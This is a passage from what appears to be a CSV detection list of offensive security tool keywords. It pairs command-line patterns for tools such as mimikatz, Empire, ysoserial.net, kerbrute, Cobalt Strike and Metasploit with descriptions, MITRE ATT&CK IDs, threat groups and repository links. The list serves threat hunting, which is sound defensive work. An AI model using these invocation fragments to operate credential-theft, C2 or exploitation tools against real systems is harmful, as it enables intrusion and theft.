T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,0,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -* -p 4644 -n mal*,offensive_tool_keyword,Gotato,Generic impersonation and privilege escalation 
with Golang. Like GenericPotato both named pipes and HTTP are supported.,T1003.003 - T1056.002 - T1550.001 - T1090,TA0005 - TA0004 - TA0009,N/A,N/A,Privilege Escalation,https://github.com/iammaguire/Gotato,1,0,N/A,9,2,114,16,2021-06-07T21:19:58Z,2021-06-05T22:32:48Z -* -p 'aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0'*,offensive_tool_keyword,ad-ldap-enum,An LDAP based Active Directory user and group enumeration tool,T1087 - T1087.001 - T1018 - T1069 - T1069.002,TA0007 - TA0003 - TA0004,N/A,N/A,AD Enumeration,https://github.com/CroweCybersecurity/ad-ldap-enum,1,0,blank lmhash,6,3,290,72,2023-02-10T19:07:34Z,2015-08-25T19:38:39Z -* -p ActivatorUrl*,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,0,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -* -p Altserialization*,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,0,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -* -p CommonsCollections1 -c whoami*,offensive_tool_keyword,pysoserial,Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,shell spawning,https://github.com/aStrowxyu/Pysoserial,1,0,N/A,9,1,9,1,2021-12-06T07:41:55Z,2021-11-16T01:55:31Z -* -p DotNetNuke*,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation 
Tools,https://github.com/pwntester/ysoserial.net,1,0,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -* -p LastLogonTimestamp -p LastLogonUserName *,offensive_tool_keyword,SharpSCCM,SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI,T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/Mayyhem/SharpSCCM/,1,0,N/A,N/A,5,412,53,2023-09-16T17:33:11Z,2021-08-19T05:09:19Z -* -p powershell -i *.ps1 -o *.vba*,offensive_tool_keyword,MaliciousMacroMSBuild,Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.,T1059.001 - T1059.003 - T1127 - T1027.002,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/infosecn1nja/MaliciousMacroMSBuild,1,0,N/A,8,5,488,117,2019-08-06T08:16:05Z,2018-04-09T23:16:30Z -* -p SessionSecurityTokenHandler*,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,0,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -* -p shellcode -i *.bin -o *.vba*,offensive_tool_keyword,MaliciousMacroMSBuild,Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.,T1059.001 - T1059.003 - T1127 - T1027.002,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/infosecn1nja/MaliciousMacroMSBuild,1,0,N/A,8,5,488,117,2019-08-06T08:16:05Z,2018-04-09T23:16:30Z -* -p test_passwords.txt*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the 
security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* -p TransactionManagerReenlist*,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,0,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -*' p::d '*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,0,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -* -p:AssemblyName=inveigh*,offensive_tool_keyword,Inveigh,.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers,T1550.002 - T1059.001 - T1071.001,TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/Kevin-Robertson/Inveigh,1,0,N/A,10,10,2212,441,2023-06-13T01:36:42Z,2015-04-02T18:04:41Z -* p2p-conficker.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --pacu-help*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -* papacat.ps1*,offensive_tool_keyword,JustEvadeBro,JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.,T1562.001 - T1055.012 - T1218.011,TA0005 - TA0040 - TA0010,N/A,N/A,Defense Evasion,https://github.com/sinfulz/JustEvadeBro,1,0,N/A,8,3,260,25,2023-03-30T06:22:24Z,2021-05-11T06:26:10Z -* parrot main *,offensive_tool_keyword,parrot os,Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.,T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105,TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011,N/A,N/A,Exploitation OS,https://www.parrotsec.org/download/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* parrot.run/*,offensive_tool_keyword,parrot os,Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.,T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105,TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011,N/A,N/A,Exploitation OS,https://www.parrotsec.org/download/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* parrot-backports *,offensive_tool_keyword,parrot os,Parrot OS is a Debian-based. 
security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.,T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105,TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011,N/A,N/A,Exploitation OS,https://www.parrotsec.org/download/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* parrot-security *,offensive_tool_keyword,parrot os,Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.,T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105,TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011,N/A,N/A,Exploitation OS,https://www.parrotsec.org/download/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* password.lst*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* -PasswordList *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-SMBAutoBrute.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* --password-list *,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -* --password-not-required --kdcHost *cme*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation 
Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* passwordspray -d *,offensive_tool_keyword,kerbrute,A tool to perform Kerberos pre-auth bruteforcing,T1110,TA0006,N/A,N/A,Credential Access,https://github.com/ropnop/kerbrute,1,0,N/A,N/A,10,2144,368,2023-08-10T00:25:23Z,2019-02-03T18:21:17Z -* path-mtu.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -pathToBloodHoundGraph * -pathToOutputGoFetchPath * -pathToAdditionalPayload *,offensive_tool_keyword,GoFetch,GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.,T1078 - T1078.003 - T1021 - T1021.006 - T1076.001,TA0005 - TA0001 - TA0003,N/A,N/A,Exploitation tools - AD Enumeration,https://github.com/GoFetchAD/GoFetch,1,0,N/A,10,7,615,126,2017-06-20T14:15:10Z,2017-04-11T10:45:23Z -* -PathToDMP *.dmp*,offensive_tool_keyword,powerextract,This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. 
It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process,T1003 - T1055 - T1003.001 - T1055.012,TA0007 - TA0002,N/A,N/A,Credential Access,https://github.com/powerseb/PowerExtract,1,0,N/A,N/A,1,99,14,2023-07-19T14:24:41Z,2021-12-11T15:24:44Z -* -PathToGraph *.json -PathToPayload *.exe*,offensive_tool_keyword,GoFetch,GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.,T1078 - T1078.003 - T1021 - T1021.006 - T1076.001,TA0005 - TA0001 - TA0003,N/A,N/A,Exploitation tools - AD Enumeration,https://github.com/GoFetchAD/GoFetch,1,0,N/A,10,7,615,126,2017-06-20T14:15:10Z,2017-04-11T10:45:23Z -* -Payload * -method sysprep*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -* --payload * --platform windows*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -* -payload *-Lhost *-Lport*,offensive_tool_keyword,empire,Empire scripts arguments. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* payload add *,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,0,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -* --payload CommonsCollections*,offensive_tool_keyword,pysoserial,Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,shell spawning,https://github.com/aStrowxyu/Pysoserial,1,0,N/A,9,1,9,1,2021-12-06T07:41:55Z,2021-11-16T01:55:31Z -* payload start *,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,0,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -* --payload_file * --payload_path*,offensive_tool_keyword,vRealizeLogInsightRCE,POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711),T1190 - T1071 - T1003 - T1069 - T1110 - T1222,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/horizon3ai/vRealizeLogInsightRCE,1,0,Added to cover the POC exploitation used in massive 
ransomware campagne that exploit public facing Vmware ESXI product ,N/A,2,147,24,2023-01-31T11:41:08Z,2023-01-30T22:01:08Z -* --payloadcookie *,offensive_tool_keyword,SharpSocks,Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell,T1090 - T1021.001,TA0002,N/A,N/A,C2,https://github.com/nettitude/SharpSocks,1,0,N/A,10,10,453,89,2023-03-15T19:19:30Z,2017-11-10T13:29:08Z -* --payload-file pwn.bat*,offensive_tool_keyword,SplunkWhisperer2,Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations,T1068 - T1059.003 - T1071.001,TA0003 - TA0002 - TA0011,N/A,N/A,Lateral Movement - Privilege Escalation,https://github.com/cnotin/SplunkWhisperer2,1,0,N/A,9,3,239,53,2022-09-30T16:41:17Z,2019-02-24T18:05:51Z -* -PayloadPath *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-BypassUAC.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* PayloadsDirectory*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -* payloadtests.py*,offensive_tool_keyword,the-backdoor-factory,Patch PE ELF 
Mach-O binaries with shellcode new version in development*,T1055.002 - T1055.004 - T1059.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/secretsquirrel/the-backdoor-factory,1,0,N/A,10,10,3185,809,2023-08-14T02:52:06Z,2013-05-30T01:04:24Z -* PayloadType.BIND_TCP*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,0,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -* --payload-types all*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,0,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -* --payload-types bin*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and 
python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,0,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -* --payload-types dll*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,0,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -* --payload-types exe*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - 